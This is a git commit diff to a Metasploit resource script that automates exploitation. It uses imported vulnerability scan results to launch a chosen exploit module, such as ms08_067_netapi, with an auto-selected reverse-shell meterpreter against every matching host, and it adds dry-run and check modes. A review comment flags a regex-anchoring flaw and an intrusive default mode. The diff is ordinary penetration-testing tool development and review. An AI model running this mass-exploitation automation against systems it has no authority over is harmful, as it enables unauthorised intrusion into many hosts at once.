Rewrite how each mode is handled

unstable
sinn3r 2012-07-10 16:06:07 -05:00
parent b449c0e21c
commit ce107fbd6f
1 changed files with 49 additions and 29 deletions


@ -1,4 +1,3 @@
<ruby>
#
# Print the help function
@ -6,25 +5,27 @@
def help_me
help = %Q|
Description:
This Metasploit RC file can be used to automate the exploitation process. Before
using this script, you should import your vulnerability results to Metasploit, and
then it will exploit each possible host when there is a match to one of the
references. A reverse shell is automatically selected for you, and will always
default to a suitable meterpreter.
This Metasploit RC file can be used to automate the exploitation process. Before using the
script, you must import your vulnerability results to Metasploit so that it can deploy the
module based on matching references. Three modes are available: exploit/dry/and check.
In exploit mode, it will attempt to gain access to all vulnerable hosts with the most
suitable reverse shell that's automatically selected. In "dry" mode (dry-run), it'll list
all the hosts vulnerable to the exploit. In check mode, it will only trigger the check()
function found in the module. If no mode is specified, then it'll default to 'exploit'.
Usage:
./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [mode]
Arguments:
rc_path - Full path to the RC script
db_user - Username for MSF database (datastore: 'DB_USER')
db_pass - Password for MSF database (datastore: 'DB_PASS')
db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE')
module_path - Path to the exploit (datastore: 'MODULE')
mode - Optional. Dry-run mode [dry/check] (datastore: 'MODE')
db_user - Username for MSF database (datastore: 'DB_USER')
db_pass - Password for MSF database (datastore: 'DB_PASS')
db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE')
module_path - Path to the exploit (datastore: 'MODULE')
mode - Optional. Accept:exploit/dry/check (datastore: 'MODE')
Example:
msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi dry
Example of running an exploit:
msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi
Authors:
sinn3r <sinn3r[at]metasploit.com>
@ -114,7 +115,7 @@ end
#
# Start the exploitation
# Exploit mode
#
def auto_exploit(module_path)
exploit = load_exploit(module_path)
@ -146,9 +147,9 @@ end
#
# Find all mathing references
# Dry-run mode
#
def dry_run(module_path,mode)
def dry_run(module_path)
exploit = load_exploit(module_path)
raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
@ -157,15 +158,29 @@ def dry_run(module_path,mode)
framework.db.workspace.vulns.each do |vuln|
next if not ref_has_match(vuln.refs, exploit_refs)
addr = vuln.host.address.to_s
print_good("#{addr} seems vulnerable to #{exploit.shortname}")
if mode == "check"
print_good("checking #{addr} with check mechanism of #{exploit.shortname}")
run_single("use #{exploit.fullname}")
run_single("set RHOST #{addr}")
run_single("check")
run_single("back")
print_line("")
end
print_good("#{addr} has a matching reference to #{exploit.shortname}")
end
end
#
# Check mode
#
def check_exploit(module_path)
exploit = load_exploit(module_path)
raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
exploit_refs = exploit.references
framework.db.workspace.vulns.each do |vuln|
next if not ref_has_match(vuln.refs, exploit_refs)
print_good("Checking #{exploit.shortname} against host #{vuln.host.address.to_s}")
run_single("use #{exploit.fullname}")
run_single("set RHOST #{vuln.host.address.to_s}")
run_single("check")
select(nil, nil, nil, 1)
run_single("back")
print_line()
end
end
@ -198,7 +213,7 @@ def init_args
args[:db_pass] = ARGV.shift || datastore['DB_PASS'] || ''
args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || ''
args[:module] = ARGV.shift || datastore['MODULE'] || ''
args[:mode] = (ARGV.shift || datastore['MODE'] || '')
args[:mode] = ARGV.shift || datastore['MODE'] || 'exploit'
raise ArgumentError, "Missing a module path" if args[:module].empty?
@ -223,10 +238,15 @@ begin
end
end
if (args[:mode] == "dry" or args[:mode] == "check")
dry_run(args[:module], args[:mode])
else
case args[:mode]
when /^exploit$/i
auto_exploit(args[:module])
when /^dry$/i
dry_run(args[:module])
when /^check$/i
check_exploit(args[:module])
else
raise ArgumentError, "Invalid mode"
end
rescue ArgumentError => e
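Review bot: The patterns in the new `case args[:mode]` dispatch use `^`/`$`, which in Ruby anchor at line boundaries rather than at the ends of the string, so a multi-line MODE value (however unlikely) that contains a line reading `exploit` takes the first branch and runs `auto_exploit` even if it also names `dry` or `check`. Because this switch is what separates listing hosts from launching a module against them, it should match the whole string: `when /\Aexploit\z/i`, `when /\Adry\z/i`, `when /\Acheck\z/i`. Separately, `init_args` now falls back to `'exploit'`, so leaving the argument out selects the most intrusive mode; defaulting to `'dry'` and requiring `exploit` to be typed would fail safer. The enclosing `begin` block starts above this hunk and the `rescue` body continues past the visible lines.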